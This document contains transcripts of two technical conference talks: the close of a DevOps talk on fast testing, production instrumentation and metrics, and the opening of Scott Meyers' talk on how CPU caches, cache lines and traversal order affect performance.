The moment you complete the check-in, you stand up, you cheer, I am a god, and then you go get coffee, right? It's a normal ritual It's going to take you 10 minutes to get coffee If in those 10 minutes, I can run all of the tests and get back the mistakes you've made, the errors that exist When you sit back down here, coffee, you're like, huh? Oh yeah, you could see the error, you know what it is, because you haven't put the threads down yet If I'm taking an hour so that you're now checking Facebook, you're already forgetting, it'll take you three times longer to fix the code If it takes me a day to finish the test, I might as well give it to someone else, like, dude, I wrote that yesterday, what are we talking about? So speed became of the essence, I started getting real budget for testing infrastructure, because I could show consistently when we could get the errors back to the developer in less and less time, it took them less time to fix them, and that made better quality software The longer it took to catch the bugs and get them put in, that turned into fewer features got built, right? So that's why I learned to speak manager, managers care about budgets and deliverables, and so when I could show we iterate faster and how much it costs us to go to rate slower, I got money to fix those things, testing's never been cheaper than it is right now, so let's look at the cloud options that are out there But that's instrumenting our development environment, what about instrumenting our app? So today there are a ton of tools that allow us to actually instrument in production We're all using Visual Studio, 2010s, 2012s, 2013s, okay How many people know what preemptive analytics is? 
Not a one. It's in the box, it's a production instrumentation tool, you already own it. The free version's got limitations, the commercial version costs money per dev. I don't make anything off these guys, I just, the fact is, if you've never instrumented an app in production before, try this, you already own it. It interlaces into your DLLs, you don't have to tell operations you did it, and it literally spits out what methods are being called, how long they're running for, how many times they get called, how many errors are occurring. It's a ton of info right away. There are other ways to do instrumentation, PreEmptive Analytics is just one of them: AppDynamics, New Relic, pick one. The bigger thing here is, can we start measuring how our apps are actually being used, and there's two sets of measurements that I care about. First is errors that are actually occurring. Okay, so if you're waiting for operations to write error reports for you, you are already in hell. Right, the app crashes and they write a bug report, something along the lines of, the software didn't work. You will ask for clarification: the software didn't work at all. Getting ops to write good bug reports is hard, because they look at software very differently than we do, and so we end up arguing about the bug report and not the bug. So automate it. We're capturing production level errors: it raises an error inside of a server, captures that error, feeds it back directly. PreEmptive Analytics will create a TFS work item for you. On the operations side, System Center Operations Manager with AVIcode will create work items for you. These are the actual errors that occurred, and how many times they occurred, and what exactly they looked like, so you have the whole truth. It becomes about the data, not the guys who submitted it, instead of the arguing that happens all the time. And if you get into tools like New Relic, you can instrument the individual clients, browsers, phones, you can get feedback from everything. So you can actually see what's going on inside of
your app in terms of errors. Good tools will also tell you how people are actually using your app. I used to advocate strongly for, as a developer, especially as a project lead, having access to the log files in production. Although when you ask IT for that, they will say no, because what they heard is, I want access to the servers in production, and you do not want that, because then it could be your fault. You want access to the log files, and the reality is every ops guy keeps all the log files. They zip them up and store them on a server to be used as evidence against you. You want those, right, you just want access to those. And then they will inevitably say, just tell me when you want them and I'll send them to you, and that's when you add a recurring appointment every morning to ask for them. And after about a week of asking for them every day, they will say, if I give you this username and password, will you please stop bothering me? Because the log file is the source of the truth. Now, the instrumentation is better, we can use tools like PreEmptive, they will tell us more about what's going on. The big reason you want the log files is you know there's errors occurring, you just don't see them right now. We wait until it actually takes the system out before we look at the log file and say, hey, for three months it's been telling us, I'm gonna die, I'm gonna die. And then it died, and we're all surprised. For me, the big thing I did was about two months after we deployed the new version, I'm studying the log files, A, to see if we're gonna die, and B, to write a great report, that celebration report. It says, hey, remember we were all at that new version eight weeks ago? Here's how people are using it. That's what we don't talk about. It's so much easier to have a party when you deploy software, or when you just check it in, than it is to actually talk about how people use it. The real reason to instrument in production is to know how people actually use your software, so you know
when to throw the party, and know what to celebrate, what matters. And you start setting metrics around it: we'll know we've done it well when this many people use the feature, or when we sell this much more stuff, or the average sale goes up this much. Those are real metrics. That's what happens, we start getting real metrics about how our systems are being used, and we can actually know what to improve. Another thing that happens in the second way: you start understanding that when operations have problems, sometimes they need dev resources, not to write code, but to provide insight. We called it cross-teaming. So a senior dev would be available every weekend, if we got to a level three failure. So you've gone through the script and you've restarted things, and now you're sort of at the place where we don't know how to make this work, and it's still not working right, so in comes the experienced developer. And as the experienced developer, rule number one during a crisis is do not write code, you will make it worse. Ask me how I know. You will dig a deeper hole every time. But you know how the software was built, you can understand a lot more of what's going on. And two more things will come from that. One is, post-mortems get a lot more intelligent when there are both development and operations resources talking about a failure. They both saw it live. The number of times I've had development show up after the fact, and they said, the system did this, and the answer was, there's no way it could have done that, you misunderstood it. Conversation over. When both sets of eyes are in the room and have actually seen it fail, you can't argue that it actually happened. Now we talk about how do we fix it. So the second thing you get is better root cause analysis. Root cause analysis does not look like, be more careful next time. That's not a good outcome. I want to not have to be careful at all, and the system stays up and keeps running. And so now we get into, what do we really need to
instrument with, how do we measure these things And good metrics are hard, if management is asking for metrics, they're probably vanity metrics Because managers want good news, right, so you give them a metric like total number of users Since we never delete a user, you're pretty sure that number is going to go up Right, which is a bad metric, a good metric is something that's actionable Not, if number of users is important to the organization, and maybe it is Then the real number that's interesting is the rate of increase Right, are we actually going up faster or going up slower? We're always going to go up because you don't delete users But the rate is going to matter, that delta is a more interesting number Total sales, kind of an interesting number, total sales month over month, more interesting number Rate of change, more interesting again And you'll notice as you start getting into these metrics, they're mostly business metrics And when you can get good at owning the numbers of how this company makes money or saves money You can get more budget for stuff that matters Because if you can't move the number, it doesn't matter But if you start understanding how to move the number, you can get it changed This process of going through second way, it's really more first way Going through first way makes you understand what you know and what you don't know And you want to know more You go through second way to know more and more and more and be able to react faster That's the outcome of getting to second way, and it opens the door to third way And third way is the synergistic effect I start changing the way I build software because I can move so quickly and I can measure effectively So because it's not a big deal to create software, because my testing infrastructure responds quickly to show What it looks like, the build process works every time, whole classes of bugs never occur anymore I can afford to experiment, it turns out writing software is pretty easy It's 
actually making sure the software works, that's hard So let's get better at that, and we can start to do more experimentation Because we only learn when stuff doesn't work The problem is we're living in organizations where failure is a disaster It's avoided all the time, and it turns out failure is the only time you learn anything So if we can mitigate the cost of failure, if we can move faster so we can recover from failure quickly Look, if you can only get me a build every 12 weeks as an ops guy I can't afford to have the system down, because it's going to take 12 weeks to fix it But you can give me a build every hour? I don't care, right? There's going to be another build coming in an hour, we can fix it, it's all right I don't have to worry about rolling back anymore, I can roll forward, because there's another build coming Now I've never gotten a 10 deploys a day with any customer, I've got one customer to four The reason we got to four is that we have marketing people And this was an e-commerce site, and they need to do A-B testing on ads Because they proved, with metrics, that when they put the right ad in front of the right customer It wasn't twice as good as the wrong ad, it was 20 times as good And that's a lot of money, and so they got to change ads several times a day But because we could only do the build process about every 12 weeks We had to cheat, we built a little CMS off the side of the site That would allow them to inject new ads onto the site Which meant about once a month marketing took the whole website down Because they're sticking the JavaScript and stuff into these ads And sure enough they're going to mangle the page every so often And the culture said, if you're adding code to the system, you're developing, period So it has to follow a process And how do they get to put code in the system without going through a testing process So we switched to four deploys a day So they could do an A-B test in the morning and an A-B test in the afternoon 
We just automated the build, it happened at the same time, every day, all the tests So they raced to get their ads in the right place at the right time, and if they broke it they could fix it And that changed when we started building software, because now with features We started calling integration first, you're building features but they're not visible to the customer And you add a dashboard so that the operations guy could turn that feature off If it's going to damage the system, they want to be able to shut it off And we start going through new testing approaches We're breaking things before production, we have consistency in environments We start using asserts so that we can misconfigure anything and catch it early You know that little bar that hangs in a parking lot that says 2.5 meters? If you hit that, you don't keep driving, right? It doesn't damage your car, but it lets you know, soon, something bad will happen, right? It's just a gate, it's an assert Now, some of us would think, hey, you should be smart enough to know how tall your car is The only thing that needs to be there is a sign that says 2.5 meters, right? 
And if you don't know, oh well, so you crush the top of your car and damage the building. You should have known better, be more careful next time. We hang the pole so that you don't have to think about it: bonk, you should stop. You should do software the same way, where we have these gates that catch us early, when we make mistakes that can still be fixed cheaply. Static analysis looks like this. All of these things help add up to that ability. We start fighting back on technical debt. If you make it visible, it will get fixed. I started dedicating about a day a week to it, until it was gone, or nearly gone. The big thing to actually fighting technical debt successfully is putting metrics around it. Show that it makes or saves money and you will get it fixed, but you have to make it visible. Until it's visible, you'll never fix it, it's just invisible. Repairing technical debt is like performance tuning: nobody cares about it when it's done, they just talk about that being the time when you didn't ship anything new. Performance is just like air: there's air in this room and nobody cares about it. If I took the air out of this room, you would care. But it's the same thing with technical debt, until it's visible, nobody's going to care about it. And you also don't have to do things the one right way; with a rapid cycle, we can experiment. The marketing guys got to figure it out, they A/B test ads, why don't we A/B test features?
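As a sketch of what a feature-level A/B switch might look like in code (the function name and the hashing scheme here are illustrative assumptions, not something from the talk; real systems usually read assignments from a flag service or config):

```cpp
#include <functional>
#include <string>

// Hypothetical A/B switch: route each user deterministically to one of two
// implementations of the same feature, then compare the metrics per group.
// Hashing the user id means the same user always sees the same variant.
bool inVariantB(const std::string& userId) {
    return std::hash<std::string>{}(userId) % 2 == 1;
}
```

With a switch like this, both candidate implementations of a feature can ship together, and the production instrumentation decides which one wins.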
If you had that battle with a couple of experienced guys trying to find out the best way to write a particular feature: don't figure it out, write them both, try it. Get metrics around it, get feedback from it, you've got the instrumentation now, and you can actually make a better version of the product. You start feeding features to the domain experts, to your requirements guys, based on how the software was actually used. Not focus groups, because humans lie, but actually how are people using the software. A whole different way of thinking about features. You start being able to anticipate what the new features are going to be, what people actually need, where people are spending too much time, where they're having problems, stuff they like and stuff they don't like. And that becomes really fun. Software becomes an experiment, a laboratory that you're constantly trying to make better, and you have metrics to show when you are getting better. You know when to throw the party. In the end, this is all about just making better software, and really enjoying doing it. You have this pride in building software that is really responsive to the business needs. If you want to know more about this, here's five books. I've listed them in the order you should buy them in, and it turns out that it's by length too. The top book, The Phoenix Project, this is Gene Kim's book. It's written in a fictional style; don't read it for the love story, read it for the experience of taking a system that was in trouble and making it successful. It's a quick read, and it's really an inspirational piece to start thinking in those terms. The next book on the list, The Lean Startup: you do not need to be in a startup to read Eric Ries's book. It's very popular in Silicon Valley right now, it's like that's the hotness these days. Two things are important in that book. First is this concept of minimum viable product. Once you have instrumentation in place, and you can see how people actually use
your app, you can start building stubs of features and seeing if anybody cares. That's minimum viable product; Ries talks about it extensively. But the biggest thing is, in the middle of this book there's a chapter on: suppose you're not in a startup, suppose you're in a bigger organization but you want to move faster, what do you do? Read that chapter. Read the whole book, but that chapter is the one that will grab you if you're in a bigger organization and you're just looking at this going, I want this, but how? How can I possibly talk anyone into it? There's a bunch of useful material around how to do that. These three other books are the bigger, heavier ones. Gene Kim's Visible Ops book is an operations oriented book; it's useful to read just to understand how operations can be. Allspaw's book on Web Operations is the web focused version of that same thing, and it gets really into continuous delivery. And the Continuous Delivery book by Jez Humble, who was here last year, is a fantastic book on just how we as developers can deploy software more quickly with higher quality. Folks, that's all the time I've got. Thank you so much for listening, and I hope you have a great conference.
DevOps is about making software better – by bringing everyone involved in software closer together, including (but not limited to): domain experts, architects, developers, designers, testers, security and operations. This session takes you through the DevOps culture, focusing on people, process and tools (in that order). You’ll learn how to get the conversation started between the teams, how to bring the teams closer together, and how to ultimately become one team (we’re all in this together)! Understanding DevOps is about focusing on what’s important: building and delivering the best software you can.
10.5446/50550 (DOI)
Okay. I'm Scott Meyers. I want to talk about CPU caches and why you might want to care about them in the first place. So to build a certain degree of suspense into what we're talking about right here: usually I am in a situation where I can look back at the screen and sort of use my laser pointer and point at it, but if I try to do that I will literally fall to my death. So for those of you who find the talk particularly boring, bear in mind that at any moment I could die. So if that doesn't improve ratings, I don't know what will. I want to point out that a suitable way to express your appreciation for my failure to die, or, depending on your perspective, my dying, would be to turn in a green card if I succeed one way or another. I want to talk about a couple of ways to traverse arrays. Now what I'm going to be showing here is a chunk of memory inside the machine. This is all about what's going on on the hardware. And before I go any further, how many people are working in a managed language? Okay, lots of people are working in a managed language. That's great. I have news for you. There is something below the virtual machine. There is the actual hardware. And the actual hardware does not care anything about what programming language you are using, or whether it's running on top of a hypervisor, or whether you have some kind of abstract machine. The underlying hardware really has a very limited set of concerns. So let us suppose I have a chunk of memory which represents an array, and what I want to do is walk through that memory. Maybe I want to add up the values in the entire matrix, let's say, or maybe I want to count the number of odd values. The point is I want to traverse the matrix once, looking at every individual element. And there's two ways I can do that. I can start on the first row and I can go row by row. That is known as a row major traversal. Or I can go column by column. That is known as a column major traversal.
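The two traversals described here can be sketched in C++ roughly like this (a minimal reconstruction, not the exact benchmark code from the slides):

```cpp
#include <cstddef>

// A dim x dim matrix stored as one contiguous block, in row-major order as
// C and C++ lay it out. Both functions visit every element exactly once;
// only the order of the nested loops differs.
long long sumRowMajor(const int* m, std::size_t dim) {
    long long sum = 0;
    for (std::size_t r = 0; r < dim; ++r)
        for (std::size_t c = 0; c < dim; ++c)
            sum += m[r * dim + c];   // consecutive addresses in memory
    return sum;
}

long long sumColumnMajor(const int* m, std::size_t dim) {
    long long sum = 0;
    for (std::size_t c = 0; c < dim; ++c)
        for (std::size_t r = 0; r < dim; ++r)
            sum += m[r * dim + c];   // jumps of dim elements between accesses
    return sum;
}
```

Both functions compute the same result over the same memory; the point of the talk is that their running times differ dramatically because of how they interact with the cache.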
Both traversals touch exactly the same memory. They do exactly the same conceptual amount of work. If you write the code for these two kinds of traversals, you will find that the code is very similar for a row major or a column major traversal. It's basically a matter of whether, in the nested for loops, you have the rows on the outside or the columns on the outside. So the code that is shown here happens to be C++ but it's going to look very, very similar in every other programming language. So basically the code on the top is showing you how a row major traversal works and the code in the else clause is showing how a column major traversal works and the red is showing you the difference between the two. So from a programming perspective, row major, column major, they touch the same chunks of memory. And in terms of writing the code, it's no more difficult to write one than the other. The source code looks about the same. So everything seems like it's, you know, about the same. What's interesting is the performance is not at all the same. So what I did was I wrote a little benchmark here and what I was doing was plotting how much time it takes to simply traverse the matrix looking at every element exactly once as a function of the total size of the matrix. So if you look on the bottom, you see that the matrix starts with a size of zero and it goes up to 35 megabytes. Now, I did this with two compilers, happened to be Microsoft's compiler and the GCC compiler for C++. But again, you're going to get similar results in anything that actually runs on the hardware. And what I want you to notice is that first we've got the sort of the magenta line that has that nice little bend in it. That's the brighter, higher line. That corresponds to a column major traversal. Now, what you can't see as well, but if you look very, very closely, there are little blue Xs next to most of those magenta data points. Those little blue Xs are for a different compiler. 
So basically we have two compilers. One of them is GCC, one of them is Microsoft's compiler. So independent people writing their own compiler, but you can see that the performance you're getting is about the same in both. Now, below that magenta line, you can see what look like dark black diamonds. It's a nice straight line and below that are some yellow triangles. Now, those both correspond to a row major traversal. Now, the first thing I want you to notice is those two lower lines down there, these two lines here, those are the row major traversal. They are much, much better than the column major traversal, regardless of the compiler. And the column major traversal here is bad compared to row major with both compilers. So this is not a compiler dependent phenomenon that we are looking at. Now, it turns out that the sort of the blueish black dots here, this happens to be for Microsoft's compiler and this happens to be for GCC's compiler. I do not want you to go, ah, I know what he's driving at, Microsoft's compiler sucks. That is not the conclusion I am asking you to come to. What I'm asking you to come to is the observation that a row major traversal with both compilers is noticeably faster than a column major traversal with either compiler, which strongly suggests that what we're looking at is a phenomenon that has to do with the underlying machine and not with how that code is compiled. So what we conclude is the traversal order matters. What's interesting is the question, well, why does it matter? We're touching the same amount of memory, but I'm not going to answer that question. I want to talk about something different for a moment. So Herb Sutter a number of years ago published an article where he wanted to find out the number of odd elements in a square matrix. So this is some pseudocode that he put together. This is sequential pseudocode. So we have a square matrix. Each side has dim elements in it. So it's a dim by dim matrix. 
And what we want to do is figure out how many elements are odd numbers. So that's pretty straightforward here. We have a couple of nested loops and basically if the element we're looking at modulo 2 is not 0, then we increment the number of odds. So this will walk through that matrix, checking every element to see if it's odd. If so, it'll increment the count. Works fine. However, if you have a very large matrix, gigabytes in size, for example, a very large matrix, then there's no reason to do it sequentially. You might as well do it in parallel. It's easy enough to break that matrix into a bunch of independent chunks and then have different threads look at different parts of the matrix and that should run a lot faster. So Herb wrote the following pseudocode. Now this happens to be pseudocode in pseudo C++. So if you don't know C++, trust me. And if you do know C++, I understand this is not real C++, blame Herb. But the important thing here is basically what we're doing is we're going to take this matrix. And what I like to point out is you can tell the difference between somebody who publishes code that is supposed to be described orally and someone who publishes code that is only designed to be read. And one of the ways you can tell the difference is that you probably would not choose capital P and lowercase P if you were planning on talking about things orally. So I will attempt to convey this as follows. What we're going to do is we're going to assume that we have capital P workers, and an individual one of those P workers we'll call lowercase p. As I said, this is what Herb wrote. So basically, if you take a look at the code, fundamentally what it's doing is it's taking the matrix, it's dividing it by the number of threads that we have. It's breaking it into a beginning point and an ending point for each one of those threads so they can operate on independent chunks of the matrix. It then spawns an individual thread for each one of the chunks. 
It has each one of the chunks look at its own section of the matrix, counts up the number of odd numbers, and then when they're all done, the threads get joined. And what is important to us here is we have an array here that has enough room for P elements. So every one of those threads is writing into its location in that array how many odd numbers it has found. So thread number eight will write into slot eight how many odd numbers it found on its portion of the matrix. And similarly for thread nine, ten, two, three, like that. And then after performing the join operation, so all the threads come together, so after performing all the joins, we simply sequentially then add up all the numbers. And one of the reasons why I show Herb's data when talking about this particular problem is because Herb has access to a machine with 24 cores which makes me feel extremely inadequate. I don't have a machine with 24 cores. But what's cool about this is, so this is the scalability. So what we see here is this is how long it takes to get something done with one core. So if we double the number of cores, we give it twice as much computational horsepower. And it responds by immediately dropping by 42%. It's about half as fast. No problem. We have a 24 core machine. We will just keep adding more and more horsepower, which we do. And finally, when we get up to about, oh, 16, 17, 18 cores, we are back at 100% of the performance with one core. That's the kind of scalability result you want to show your managers. 15 times as many cores, it runs exactly as fast as when we only had one core. That's what we're really looking for. But that's okay. We have more cores. Well, Herb has more cores. So we keep throwing more at it. And finally, we get up here. We finally peak at about 40% higher than a single core. 
But there's something distressing about throwing 20 times as much computational hardware at a problem and getting a 40% speedup on what is obviously an embarrassingly parallel problem. So we'd like to think that we could do a little better than that. So if we take the pseudo code for performing things in parallel and we make an extremely tiny change. Now, what we did before was we had an array of P elements where each one of the threads was going to write into the array how many values it found that were odd. We're still going to do that. However, what we're going to do is for each thread, and this indentation level is in each individual thread, each individual thread is going to keep its own local counter of how many odd numbers it's found. It's initialized to zero. As it runs, it will then increment its local counter. And when it's finished with its portion of the matrix that it's supposed to look at, it's going to take its local counter, which it's then going to write into its location in that array. So the only difference is that instead of writing our results into the array as we go, we're going to keep track of them locally and then we're going to write them into the array when we are done. That's the only difference. Conceptually, this can't change anything. I mean, the code is more complicated now. We're using an extra local variable. We're wasting memory. Well, it turns out this memory waste turns out to be worthwhile because now we get perfect scalability. That's kind of nice. Clearly, the access patterns that we get under multithreading make a difference. But the question is why? And the answer has to do with CPU caches, which is the whole point of this talk here. CPU caches are small amounts of unusually fast memory. That's all caches are: just unusually fast memory, where unusually fast means faster than main memory. Also means more expensive or else we'd have it all over the place. That's what a CPU cache is. 
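A compact, runnable rendering of the local-counter version just described (my own code, not Herb's pseudocode; `count_odds_parallel` and the chunking details are my invention, and I assume `p` is at least 1):

```cpp
#include <cstddef>
#include <thread>
#include <vector>

// Count odd values in `data` using p threads. Each thread keeps a counter
// on its own stack and writes its total into results[t] exactly once when
// it finishes, rather than incrementing the shared array as it goes.
long long count_odds_parallel(const std::vector<int>& data, unsigned p) {
    std::vector<long long> results(p, 0);
    std::vector<std::thread> threads;
    std::size_t chunk = data.size() / p;
    for (unsigned t = 0; t < p; ++t) {
        std::size_t begin = t * chunk;
        std::size_t end = (t == p - 1) ? data.size() : begin + chunk;
        threads.emplace_back([&, t, begin, end] {
            long long local = 0;                 // thread-local counter
            for (std::size_t i = begin; i < end; ++i)
                if (data[i] % 2 != 0) ++local;
            results[t] = local;                  // single write when done
        });
    }
    for (auto& th : threads) th.join();
    long long total = 0;                         // sequential sum after join
    for (long long r : results) total += r;
    return total;
}
```

Moving the increments into `local` is the "extremely tiny change": the shared `results` array is written only p times in total instead of once per odd element.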
And the reason it's important for performance purposes is because the access latency is much smaller than it is for main memory. There are three common kinds of CPU caches. Hardware engineers are clever people. They come up with new kinds all the time. But fundamentally, on a day-to-day basis, the kinds of CPU caches you'll normally be dealing with are: there's the data cache, also known as the D cache, and amongst the truly chic known as the D dollar sign. So that's the data cache. Stores data that's used by the program. There is the instruction cache, also known as the I cache or the I dollar sign. The instruction cache caches recently accessed instructions. And just when you thought that caches can be identified because they use the word cache in the name, we have the translation look-aside buffer, the TLB, which is also a cache. It just doesn't say so. And the TLB, and this is the only slide where I'm going to mention it, what it does is if you're running on a virtual memory system, you need to have a way to translate from the page value in your virtual address space into the page number of the physical memory page. And what the TLB does is it caches the most recent translations. So it's basically for doing quick look-ups of the result of a translation from your virtual memory page to your real memory page. And I'm not going to say anything more about TLBs from now on because it turns out that if you optimize for the data cache and the instruction cache, the TLB gets optimized at the same time. So that's the situation. If you read online commentary blogs and stuff from developers who work with caches, you come across some really interesting comments. So this is one from Sergey Solyanik from Microsoft. So he talks about: Linux was writing packets at about 30 megabits per second wired and about 20 megabits per second wireless. Windows CE was crawling at about 12 megabits per second wired and six megabits per second wireless. Now let me put this in perspective for you. 
So what this comment is really saying is, so we work at Microsoft and all the power of Microsoft with all of the smart people and really powerful buildings was running at about half the speed of those open source weenies who work on Linux. From Microsoft's perspective, this is not a good thing. But he goes on, we found out that Windows CE had a lot more instruction cache misses than Linux. So I want to point out this is talking about the instruction cache. And the reason I mention this is because usually when you hear about caching, it's almost always about the data cache. This is talking about the instruction cache, the forgotten cache that does in fact make a difference. So he goes on: after we changed the routing algorithms to be more cache local. So they changed the way that they wrote the code so that it would work better with the underlying hardware. We started doing 35 megabits per second wired and 25 megabits per second wireless, 20% better than Linux, and Microsoft lived happily ever after. But the message I want you to take away is they had a performance problem and they rewrote the instructions to make better use of the instruction cache so it would work better with the hardware. Another quote, this one is from Dmitry Vyukov. He did the Relacy Race Detector. I like this quote because this is a man with conviction and enthusiasm. Cache lines are the key. Exclamation mark. Undoubtedly, exclamation mark. If you will make even a single error in the data layout, you will get a factor of 100 slower solution, exclamation mark, and in case you think he's joking, no jokes, exclamation mark. That's about the data cache. That's not the instruction cache. He's talking about the data cache, different cache, different problem, still important. CPU caches are typically on modern hardware organized into cache hierarchies, what are usually known as multi-level caches. 
So to give you some specific numbers and talk about something specific, I'm going to be talking about a particular processor. It happens to be the Intel Core i7 900 series. And in case you are wondering why I chose this particular processor, it's because at the time I originally put these slides together, I was researching a new computer I was going to get. That's what's inside this thing, which these days can also be used as a weapon or a boat anchor. It's so big. But it's got a nice processor inside. So I want to point out, I want to talk a little bit about the characteristics of this particular processor, which is representative of lots of processors these days. So it has 32 kilobytes. 32 kilobytes. Remember kilobytes? Not megabytes, not gigabytes. That's how much memory it has in the level one cache, in particular the level one instruction cache. It has another 32 kilobytes of memory in the level one data cache. Now that's per core. This particular processor happens to have four cores. That 32 kilobyte level one instruction cache and that 32 kilobyte level one data cache are shared by two hardware threads. They basically compete for what goes into those two caches on this particular machine. After the level one cache, which is the, what the heck, I'll lie to you, it is the fastest memory in the machine, is the second fastest memory in the machine. That is the level two cache, the level two cache on this particular machine, 256 kilobytes of level two cache per core. However, it is shared for both instructions and data, and it's shared by two hardware threads. So it's quite a bit larger, but now we don't segregate instructions and data. Instead, they're sharing the same cache, and they're both used by two hardware threads. Finally, we get to the level three cache. Eight megabytes, megabytes, eight megabytes of level three cache holds instructions and data, but don't get too excited. 
It's shared by all four hardware cores, and that means eight hardware threads. So this is a picture. The caches are not drawn to scale. If you go back and look at the numbers, you're going to see that these don't match the scale, but this does show you basically what's going on here. So this particular machine, it's got four cores. Each core has two threads on it because it's using hyperthreading. Each one of those cores has a level one instruction cache, a level one data cache, which are independent. They share a level two cache. They share a level three cache with all the other cores. Oh, and by the way, in case you didn't remember, somewhere way off in the distance is main memory. There is actually main memory. That's where all those pesky gigabytes come in. Not that they do you any good, because if you are not running inside your cache hierarchy, you are waiting. I told you before that caches are small amounts of fast memory. I want to emphasize the part about caches being small. So let's assume I have a 100 megabyte program image, not terribly large, a 100 megabyte program image. That's code plus data. That means 8% of your entire image would fit into the level three cache on the particular machine that I'm talking about right here. But remember, that level three cache is shared by every process running on the machine, including the operating system. So the best you can possibly do is to get 8% of your program image in the level three cache, which remember is the slowest of the caches. That's not a lot. One quarter of 1% will fit into every level two cache. That's not much either. And a whopping three one hundredths of a percent will fit in each level one cache. Caches are small. That's important. There's not a lot of cache available. I said caches are small amounts of unusually fast memory. They're unusually fast compared to main memory. On this particular machine, the level one latency, you go to level one cache, is four cycles. 
Now I told you I was gonna lie and say it was the fastest memory on the machine. I feel guilty. I feel compelled to clarify that. The fastest memory on the machine are the registers. So the registers you can think of as level zero cache. But there's really not very many of those. But you can get to a register in one cycle. On this particular machine, going to level one cache costs you four cycles. So it's one fourth as fast. You go to level two cache, the latency is 11 cycles. It's about a third as fast as the level one. You go to the level three cache, it's 39 cycles. It's about one third as fast as the level two. If you go to main memory on this particular processor, it's 107 cycles, which means that it is 27 times slower than level one. And what's fun about this is if you run a profiler on your program to find out how busy things are, when a processor is waiting for data from memory, that is not considered an idle processor. It's considered to be busy with most CPU profilers. Which means it is entirely possible to have a machine that is idle 99% of the time that shows 100% CPU utilization. I like to give these kind of upbeat talks to put everybody in a really good mood. If you are interested in having programs that run quickly, if you're at all concerned about performance, forget all those gigabytes of memory. They don't count. The only thing that matters is cache. Everything else is so slow that it just doesn't make a difference. So in this particular case on this machine, we've got eight megabytes of fast memory. And remember, that includes the slow fast memory. Because everything else slows things down by orders of magnitude. Fundamentally, as far as the hardware is concerned, small is fast. You often hear about, well, you know, there's a time-space trade-off. You hear about time-space trade-offs when you go to school. The hardware did not go to school. The hardware is a souped-up toaster. 
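To make those ratios concrete, here are the cycle counts just quoted for that Core i7, with the "main memory is roughly 27 times slower than level one" arithmetic spelled out. These are the numbers from the talk, not measurements of mine, and they vary by processor:

```cpp
// Access latencies quoted for the Intel Core i7 900 series, in CPU cycles.
constexpr int register_latency = 1;    // the "level zero cache"
constexpr int l1_latency       = 4;
constexpr int l2_latency       = 11;   // roughly a third as fast as L1
constexpr int l3_latency       = 39;   // roughly a third as fast as L2
constexpr int memory_latency   = 107;

// Main memory vs. L1: 107 / 4 = 26.75, i.e. about 27 times slower.
constexpr double memory_vs_l1 =
    static_cast<double>(memory_latency) / l1_latency;
```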
The hardware thinks that small is fast and you're not going to convince it otherwise. This means, just with what we've talked about so far, compact code that is well localized, that tends to access the same instructions over and over and over, that fits in cache. So the loop fits entirely within your 32 kilobyte level one cache. That's fast. Anything else is slow. Compact data structures that are well localized and that fit in your cache will also be fastest. And data structure traversals that only touch cached data are going to be fastest. That's just dictated by the hardware. Caches aren't accessed the way normal memory is. Caches are accessed in terms of cache lines. So when you fetch an individual byte from main memory, conceptually you go, oh, I'm going to go and get a char, for example. You are not getting a char. What you are going to do on most modern machines is you're going to bring back a 64 byte cache line. It depends on the particular architecture you're working on, but that's pretty common. So on the Core i7, the processor I've been talking about, it has 64 byte cache lines. That seems to be very common these days for mainstream processors from Intel and from AMD. And to put things in perspective, that means that a cache line will hold 16 32-bit values. So let's say 16 integers on a 32-bit machine, 16 elements of an array of int on a 32-bit machine, 8 64-bit values, so maybe eight floats or, excuse me, eight doubles. Main memory is read and written in terms of cache lines. If you ask for a single byte, you get a whole cache line. It keeps the bus busy. If you write a single byte, eventually that entire cache line, whatever cache line that contains that byte, is going to go back out to main memory. This becomes really important. You want to make sure, for example, if you go to the trouble to read in a cache line, you'd like to use the whole thing. 
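The capacity arithmetic for a 64-byte line can be checked directly, assuming the usual 4-byte `int32_t` and 8-byte `double`:

```cpp
#include <cstddef>
#include <cstdint>

// 64-byte cache lines, as on the Core i7 and most current x86 parts.
constexpr std::size_t cache_line_bytes = 64;

// 16 32-bit values per line, 8 64-bit values per line.
constexpr std::size_t ints_per_line    = cache_line_bytes / sizeof(std::int32_t);
constexpr std::size_t doubles_per_line = cache_line_bytes / sizeof(double);
```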
If you go to the trouble to write out anything on a cache line, you'd like to write out more than one byte. This feeds into the notion of using compact data structures or using instructions which have as much stuff packed together as you can possibly get. So visually, to try to put things in perspective, this actually is to scale. That's a byte. That's 64 times as big. That's a cache line. So when you're programming with caches, you have to think in terms of cache lines rather than just thinking in terms of the individual elements of the cache. This explains, by the way, why a row major traversal is so much faster than a column major traversal. With a row major traversal, when I go to the first element of a row major traversal, then I'm going to go to the beginning of this cache line here. So, all right, maybe I twiddle my digital thumbs while I'm waiting for that cache line to be brought in. But once the cache line's there, I'm now walking down the cache line, picking up element after element. So I get one slow access and 60 some odd fast accesses. And then I get another slow one and then a whole bunch of fast ones. However, with a column major traversal, I bring in a cache line, read the first element. I then have to go to the next cache line, read another element. I go to the next cache line, read in the third element. So I get slow access, slow access, slow access, slow access. And in practice, what often happens is by the time you get down to the bottom here, it turns out that you couldn't fit all of these in your cache at the same time. So by the time you got down to these here, you started evicting the lines that were up on top, getting them out of the cache to make room for the lines that you needed, which means you can actually get a cache miss every single time you access something. This is the fast track to the slow lane. 
So that explains, just knowing how hardware works explains why it is that we got so much better performance with row major rather than column major traversals. It turns out the hardware, although dumb as a toaster, it's a fairly smart dumb toaster. So when you are making access to real memory addresses, the hardware is actually looking for trends. And when it begins to notice an access pattern, the simplest pattern would be, I'm walking down an array, element by element. But it could be, I'm walking down the array from the end to the beginning, element by element. It turns out the hardware knows about both directions. You can go forward, you can go backward. Hardware figures out, and it starts doing what's known as cache line prefetching. So with cache line prefetching, it's anticipating the cache lines you are likely to need in the future. And it starts bringing them into memory because who knows, you might need them. And it's even more sophisticated than that. For example, if you're reading every fifth element or every 12th element, it will begin to notice patterns doing that. And since you're probably running on a system with multi-threads, you personally may not be writing multi-threaded software, but you probably are. But something on the machine is probably running concurrently. There's probably an operating system running, for example. Turns out the hardware is smart enough to be able to track patterns by different threads and start doing prefetching for different threads all simultaneously. It's a brave little toaster. There are some implications of this behavior. Now, the first one is that locality is really important, in particular. If I have brought in some memory location A, some address A, because I either needed to read it or I needed to write it. 
